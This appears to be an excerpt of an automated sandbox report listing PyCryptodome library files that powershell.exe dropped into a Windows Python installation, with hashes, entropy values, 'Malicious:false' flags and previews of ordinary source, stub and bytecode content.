                                                                                                                                                                                                              SSDEEP:24:SKKXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/FGROi5hC3b7f5VNLjg/:SeIB0jcQHMsvI/S3oCFGROi+7nfc
                                                                                                                                                                                                              MD5:80548AD81CAB82847277B36A7FB78711
                                                                                                                                                                                                              SHA1:DF518CE7B812750B118835598A3E6278934D7F42
                                                                                                                                                                                                              SHA-256:165A0BA1E31BEC7C6E80633F113D3882CC2AC98E37F51E9224AAAE8B3DF93D67
                                                                                                                                                                                                              SHA-512:0357B12B490096A0564944310129D5EEBFAADDF5CDB3EB8465D36422AAB4AB606937FD1BB927C49904D7A43E12B9139D486D438D36B59FE06BF1145744AAA09A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#! /usr/bin/env python..#..# __main__.py : Stand-along loader for PyCryptodome test suite..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3088
                                                                                                                                                                                                              Entropy (8bit):5.338683520155293
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:zhF0H3VsWu2xwVeps/KgGXUIVAex/2BUwfLrIQHZ/yFw/81hT0QvIgO:f0XVbwMps/KgdI2ex+hLH9/mTpbO
                                                                                                                                                                                                              MD5:6C33097C5896F737D545E72A80C42B73
                                                                                                                                                                                                              SHA1:237C4599B2A725F57923C8483C5CE8853072F92F
                                                                                                                                                                                                              SHA-256:4CAFC652065949063A3731FA9E44A5965CED12376DA12207B5F9368A4252335C
                                                                                                                                                                                                              SHA-512:E17371123FF788101875B5D612EB4E863715786B3DEDD018F4F2F20D3A9A62A42B131605A11742DDCF8163BDB44242F879E7BE6328FF85E2113A4813F1653F31
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.d.d...Z.i.f.d...Z.e.d.k(..r.d...Z...e.j...................d.............y.y.).zgSelf tests..These tests should perform quickly and can ideally be used every time an.application runs.......N)...import_module)...StringIOc...........................e.Z.d.Z.d...Z.y.)...SelfTestErrorc.....................N.....t.........j...................|.|.|...........|.|._.........|.|._.........y...N)...Exception..__init__..message..result)...selfr....r....s.... .lC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/SelfTest/__init__.pyr....z.SelfTestError.__init__&...s"...............4...&..1...................N)...__name__..__module__..__qualname__r......r....r....r....r....%...s...........r....r....c...........................|...i.}.t.........j...........................}.|.. |...t.........|...........}.|.j...................|...........n/|.."|.j........
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):846
                                                                                                                                                                                                              Entropy (8bit):5.475749236809684
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:825i/U8VBZvOBZri7FtEoGlWULDZCocGtc/2IkoabBYXMXk6O:8k8GBZ27FQv8ocGG2xRbBYYk/
                                                                                                                                                                                                              MD5:51D3410AFFD51FD380F51F542208DA2A
                                                                                                                                                                                                              SHA1:3268F4AE54B638009CCDCFC6A5D596DB3B7722A9
                                                                                                                                                                                                              SHA-256:10B8756160B20841A9436B103EED8E59CEE2A13B11B1B8EAD473C5F883B3D7BD
                                                                                                                                                                                                              SHA-512:B97E094E90BC387C9388DD81D4ED3F9992C9B963BE0631ECFDEF500E209EB7AC12766417D78C17F7043A61476F5CBD6BEA014010009C666ED34281E458137329
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.eL...............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.e.j...................v.Z.e.s...e.d...........d.e.j...................v.Z.e.r...e.d...........d.e.j...................v.r.d.Z.n.d.Z.e.e.d...Z...e.j...................e.j...................e.e.............y.)......)...print_functionN)...SelfTestz.--skip-slow-testsz.Skipping slow testsz.--wycheproof-warningsz.Printing Wycheproof warningsz.-v..........)...slow_tests..wycheproof_warnings)...stream..verbosity..config)...__future__r......sys..Cryptor......argvr......printr....r....r......run..stdout........lC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/SelfTest/__main__.py..<module>r........s|............&........%........1............. ..-........9...........(..)....3.8.8.......I....I..".;N..O............C.J.J.).F..Cr....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8178
                                                                                                                                                                                                              Entropy (8bit):5.483013068052316
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R8kI3kqopFqMbkYuwcTtyEwnG1cUiqBx/trZ:83kTpFqMh388nCcUlrtrZ
                                                                                                                                                                                                              MD5:5B2618C3D42C51BDAB0C2629B008767A
                                                                                                                                                                                                              SHA1:07B7D4FFDFFA8BCCC10315C275ED6AB27D6786B3
                                                                                                                                                                                                              SHA-256:74B7B31BAA8A32546C654B27A2E17B299A9CCCFF3F1E911A6448715339520A75
                                                                                                                                                                                                              SHA-512:BBFFF42655C665DD0078C13D0BE992CFD2399BB6A721C0CAE6B28AA8C643E6C05B8C7C82A5D155889D94DDCBCC9E8BF63FAA3261539FF66DF48950ECA2515D61
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.eb .............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.....d.d.l.Z.d.Z.d...Z.d...Z.i.i.i.f.d...Z.y.#.e.$.r...d.Z.Y...w.x.Y.w.)......N)...unhexlify)...FileNotFoundErrorTFc.....................:.....d.}.g.}...G.d...d.t.................}.d.}.d.}.d.}...|.d.z...}.|.j...........................}.|.s.|...|.j...................|.............|.S.|.j...........................}.|.j...................d.........s.|.s.d.}..T|.j...................d.........r'|...|.j...................|...........d.}.|.j...................|.............|.r(|.d.z...}.d.}.|...|.j...................|.............|.d.|.|.f.z...|.........}.t.........j...................d.|.........}.|.s.|.x.j...................|.g.z...c._.........n.|.j...................d.........j...........................}.|.j...................d.........j...........................}.|.j...................|.d.........}.|..7t.........|.........d.z...d.k7..r.d.|.z...}.t.........|.|.t.........j...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1624
                                                                                                                                                                                                              Entropy (8bit):4.896403441852204
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:qOjybG8wviQvM+X2xxZnafRA/qos9QQt1:rjyo1vMF/GRA/qo6v
                                                                                                                                                                                                              MD5:88DF0C3941A0AA0FEE9BF940B6989F3C
                                                                                                                                                                                                              SHA1:5C10EE27AE602F0F556B010B90C8185C3B6E3945
                                                                                                                                                                                                              SHA-256:AC877AAB5282012F8AFECA47EC575337D76795988BD5F8B247090A5CDDD56A8B
                                                                                                                                                                                                              SHA-512:F88D1F754AE44BDDB2B2E58954441012FF233A8A80B015CA5FCD04C5891E966F3488D1A63F7E3DB27BD8CD717424421481490A1EA15B12FD4A0FE347727EECD4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e..........................<.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d...Z.d...Z.d...Z.d...Z.y.).z%Common functions for SelfTest modules.....N)...bc.....................H.....t.........j...........................j...................|.........S.).z.Return a list of TestCase instances given a TestCase class.. This is useful when you have defined test* methods on your TestCase class.. )...unittest..TestLoader..loadTestsFromTestCase)...class_s.... .mC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/SelfTest/st_common.py..list_test_casesr.... ...s................... ..6..6.v..>..>.....c...........................t.........|.t.................r(t.........d.j...................|.j...........................................S.t.........d.........j...................|.j...................................S.).z,Remove whitespace from a text or byte string..)...isinstance..strr......join..split....ss.... r......strip_whitespacer....'...s?.........
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2000
                                                                                                                                                                                                              Entropy (8bit):5.225498157362526
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:NrwEIB0jcQHMsvI/S3oCFgJ1+Ql+G8Aqbn0Quqoc9Df1UQ:JwfFQHvoj1HlOn0dqRDf1UQ
                                                                                                                                                                                                              MD5:B1A5A642E0F13E51AEE1AA096B819498
                                                                                                                                                                                                              SHA1:499EAA63461629F2883FBD1B40FFA32025CB64B4
                                                                                                                                                                                                              SHA-256:AA5EB6DDEE38BF49097C0AF6262C8B90CA0CD366AC0826DD8AAE37B63CD8B045
                                                                                                                                                                                                              SHA-512:452A98DABBD55A1EB3648CF02BA49430887609467920511907788505F9D5505C7F11EEBFF850D26722EC3F9E92B7BD14D37EA15505D09C68AD10825770D969C4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/st_common.py: Common functions for SelfTest modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15703
                                                                                                                                                                                                              Entropy (8bit):4.885505436795799
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:frskrs9VqeLElh6OXUqNF/eqHb2G6kP09W7:fr6qLjFvTh
                                                                                                                                                                                                              MD5:D6E0624C129C7C3BC3CFF8A17611430E
                                                                                                                                                                                                              SHA1:30D96A4902E6D5F54667EE9E94C2BD4D3F2DD022
                                                                                                                                                                                                              SHA-256:EBED89F64095A8B493E850D5F976AD3E30991211C5EE53F47242B18DBC762490
                                                                                                                                                                                                              SHA-512:4BC303F11DB4301738C8A9E0E983C5C13AAC63F3B6E9CC597E1C2999B8EEE241E9CEE5C2B9DAA5D7DDAA6EFB468E58E7DA52110962B49A5C9D55DA53F6382B01
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# Signature/DSS.py : DSS.py..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1121
                                                                                                                                                                                                              Entropy (8bit):4.992804063334473
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RE2C19+14f+161z4NoQoAUx9Bw+LtvUO38AdILhG8A+N8APto5BfTE5PadOI:hy+1w+1KcJoNRL9UfEIL/LWStrYdB
                                                                                                                                                                                                              MD5:38E9FC3517817B876019A478AB882734
                                                                                                                                                                                                              SHA1:34493501A5A5AE3C744CBAC46BAEA8C2F276B08B
                                                                                                                                                                                                              SHA-256:BB3A920B06532D4AA7363F205556243F2B71014E1FA0851DE64840CD26C9AD50
                                                                                                                                                                                                              SHA-512:6E003672E1F2B603325A57C66F59C0C1487243D5FC738A809FF04960C5A675AE3E68DCF0BB101CC00944DFB80FFBAF1869DA02CB8D46AD92841E9A9330689F6F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, Optional, Callable..from typing_extensions import Protocol....from Crypto.PublicKey.DSA import DsaKey..from Crypto.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......__all__ = ['new']....class DssSigScheme:.. def __init__(self, key: Union[DsaKey, EccKey], encoding: str, order: int) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .......class DeterministicDsaSigScheme(DssSigScheme):.. def __init__(self, key, encoding, order, private_key) -> None: .......class FipsDsaSigScheme(DssSigScheme):.. def __init__(self, key: DsaKey, encoding: str, order: int, randfunc: Callable) -> None: .......class FipsEcDsaSigScheme(DssSigScheme):.. def __init__(self, key: EccKey, encoding: str, order: int, randfunc: Callable) -> None: .......def new(key: Union[DsaKey, EccKey], mode: str, encoding: Optional[str]='bin
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2154
                                                                                                                                                                                                              Entropy (8bit):5.295272514709387
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHs0+mETupY34KepRG1:MwDqrYJALrYJHdt3EHGuI9DjYA3G1
                                                                                                                                                                                                              MD5:C9AD0C720C157C21F0BDE59A9C570978
                                                                                                                                                                                                              SHA1:08AD968BE36D338E46DBB26BF8F74508451FA359
                                                                                                                                                                                                              SHA-256:B54B24BE5330B4EB23A8D0BEF242BD785DFB0F1B31DCBACEB87AF47B73DB5A32
                                                                                                                                                                                                              SHA-512:79292C6608760748C9030C0C7DEEA4F600A7480AEE20290F5F9E9C55A0162F9C3A014CCD4090694DBAD8322C7FB000813D97DDC9DD7F7E88EBEBBDEDA189AF14
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):895
                                                                                                                                                                                                              Entropy (8bit):5.021175970297132
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RE2C19+1bsY4Nf3fkKov27aBAOzev9Bw+LtZ3XEDf:Jy+1o3xf1ov2GovRLP3s
                                                                                                                                                                                                              MD5:B10C8861416461026424D8341D6B711B
                                                                                                                                                                                                              SHA1:9207CD03C8A4F03ADE3FB52D7DD1828E8B734090
                                                                                                                                                                                                              SHA-256:2B2FB1983B8866D1CA635CDA145BF4639196A83A0F9B8AA7A6D0F0D39913F8F0
                                                                                                                                                                                                              SHA-512:F99F6E29E7980B548D07A760C116964872909158395D158C9199F5E458952AC37EA2D1645E186ED5EB17B570061F60D2A7A903218C9FADE89D61A5FF4562134C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: ...........def new(rsa_key: RsaKey, mgfunc: Optional[MaskFunction]=None, saltLen: Optional[int]=None, randfunc: Optional[RndFunction]=None) -> PSS_SigScheme: .....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2042
                                                                                                                                                                                                              Entropy (8bit):5.32432696462352
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIH20+8bETupt3Tk2dRGM:MwDqrYJALrYJHdt3EHGuIjRjtPGM
                                                                                                                                                                                                              MD5:7D8BF8D0C4889A5BF6BB4EB95AA44466
                                                                                                                                                                                                              SHA1:06633D6A4637773198A481EAB9ED156591DB7932
                                                                                                                                                                                                              SHA-256:0653BE50072749B16247CBB4905BB79FBD877FFC93F51C5B3E59EDC5FEB48E07
                                                                                                                                                                                                              SHA-512:68B95CBC4A39638FB7462DC391A145EC115BA045F301FEC54A475D134E5A3C93ED3223DD06C8895D2916294FB09A2A54B6D666307053F1AFC443AAF879267806
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):467
                                                                                                                                                                                                              Entropy (8bit):4.916093935652459
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:1REYBkRE1Bvxp+1bgBx1z4L556W3x1AggPIbY9Bw5ZwWOLtw3A0PIbR3:1REFC19+1bs1z4NNrAPAbY9Bw+Ltw3X2
                                                                                                                                                                                                              MD5:CA5E82193E428D853927F573B9D0AFFD
                                                                                                                                                                                                              SHA1:D1A94E957421405394C4EA31C15A384E3B758978
                                                                                                                                                                                                              SHA-256:FCA639E57C49A12AE306A309B29E2D2F49730F65AA23C5FF7DBC031A9EE8D378
                                                                                                                                                                                                              SHA-512:EEEDB242B966E71847B03C7CBBC519E77BBCB1DCCD2BE1CEE0BBF2A29B9833F22ACCAD774B7F782D4BF3D3F3EDC7B959117252D2C6C21ABFB1678166BE80AF84
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .........def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1731
                                                                                                                                                                                                              Entropy (8bit):5.278283491953278
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHQ+t1v:MwDqrYJALrYJHdt3EHGuIT
                                                                                                                                                                                                              MD5:60FAD4E2C2EF2BA9BC88934491AB89F8
                                                                                                                                                                                                              SHA1:45D630681807B431E6A26BF1438B4A477F07BE74
                                                                                                                                                                                                              SHA-256:2567D9DADE66C8CE9981C1B3856398708FFF5037E6ABBF4C0A9D60AFBD1E8678
                                                                                                                                                                                                              SHA-512:DDF73D98249043EB96E57121447EAEABB54E31DD35ACEC319FA7195B9DBC03D1B914E4014A023CB5ADC01F5DCB9C981ADF4F962EFAF011B723EC1F6C47CE5D10
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16702
                                                                                                                                                                                                              Entropy (8bit):5.447722594814528
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:yk0Uj4v1QgpwECwolewmbxzNrFzwc4dX+P/CYyhfIniZ4y+Cb0:yNUj49XiBlOZRxw3kC/JnB0
                                                                                                                                                                                                              MD5:F3ACE72BEB9106A3569804C30B0E3138
                                                                                                                                                                                                              SHA1:E438F9540AD0CB08FDD05064BF986269A6AFB55E
                                                                                                                                                                                                              SHA-256:B8BBD6C61748C33A2B5B822FA97043C364638D6703D4D47DADCD0DC255DA0CAB
                                                                                                                                                                                                              SHA-512:B793199825DF8E256AF684D6E3441C7D5D7D5605D86A12CF2BCC0FAE58D0773AA75ABD74B19142661B287D3DA5ACBF032B9144E858F511E5C8C6628DB5F56FBA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.eW=.............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.d.d...Z.y.)......)...DerSequence)...long_to_bytes)...Integer)...HMAC)...EccKey)...DsaKey..DssSigScheme..newc.....................4.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.).r....zkA (EC)DSA signature object.. Do not instantiate directly.. Use :func:`Crypto.Signature.DSS.new`.. c..........................|.|._.........|.|._.........|.|._.........|.j...................j...........................|._.........|.j...................d.z...d.z...d.z...|._.........y.).z.Create a new Digital Signature Standard (DSS) object... Do not instantiate this object directly,. use `Crypto.Signature.DSS.new` instead.. ..........N)..._key.._encoding.._order..size_in_bits.._order_bits.._order_bytes)...self..key..encoding..orders.... .hC:\Users\Administ
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1107
                                                                                                                                                                                                              Entropy (8bit):5.315245240539538
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:C69RsnU7cLzFU2xrQFdDDWDbh0YVHAjJLgJrPYuVxhEln:C69RsnU4PFU2x0jDWDbu0UhgJTPVxKn
                                                                                                                                                                                                              MD5:BF832B386209BE59F0C3A2C8A2A3A9FA
                                                                                                                                                                                                              SHA1:5AB8D14ED78244EDE81872A7638AADF2E03D99C6
                                                                                                                                                                                                              SHA-256:AC571E9CE31374F5C5A2C179C14080BFE861A32C2385D7BACE8BB03B5BFB0620
                                                                                                                                                                                                              SHA-512:5C570579738DDCFD872CFDB8774F8B63A43D0A31F7D17C307A88DC897F5A344AB649B542D7A10EE71CFB08534223973214A4A09FB0269C4343F663BBF81E1A6A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.ej.........................*.....d.Z.d.d.l.Z.d.d.l.m.Z...d...Z.d.d...Z.y.).zF.Legacy module for PKCS#1 PSS signatures...:undocumented: __package__......N)...pssc.....................T.......|.j...................|.|...........y.#.t.........t.........f.$.r...Y.y.w.x.Y.w.).NFT)..._verify..ValueError..TypeError)...self..hash_object..signatures.... .nC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Signature/PKCS1_PSS.py.._pycrypto_verifyr....*...s3..................[.)..,..............."..............s..........'...'.c..........................t.........j...................|.|.|.|...........}.|.j...................|._.........t.........j...................t.........|.........|._.........|.S.).N)...mask_func..salt_bytes..rand_func).r......new..verifyr......types..MethodTyper....)...rsa_key..mgfunc..saltLen..randfunc..pkcs1s.... r....r....r....2...s>.........G.G.G.v..&.(....<.E....L.L.E.M.....#..#.$4.e..<.E.L....L.....).NNN)...__doc__
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1024
                                                                                                                                                                                                              Entropy (8bit):5.197521113177315
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:IHasBU7cLzFt2xrmJFdDDz6f9/3oaJM4rPaYx3h/:I6sBU4PFt2xcjDzAAaaSai3l
                                                                                                                                                                                                              MD5:8DD672416DC3A5A51A89ABF88DE3F380
                                                                                                                                                                                                              SHA1:EEBDFF3E2AB4FDD29D5395DA2C5229220125D224
                                                                                                                                                                                                              SHA-256:5852313241724B202DC7E94E8B50517764D38AF5E0D8D0C65F694AC277A953E1
                                                                                                                                                                                                              SHA-512:CB0B5516D2F07B96A76FC268A973CA1BD94EE9E99446B37962C3FBE587568E9694A3F51708DF5EE1D47577D7403E77C645F22E32A3DD2CD5C2EE9E324F4F2C3C
                                                                                                                                                                                                              Malicious:false
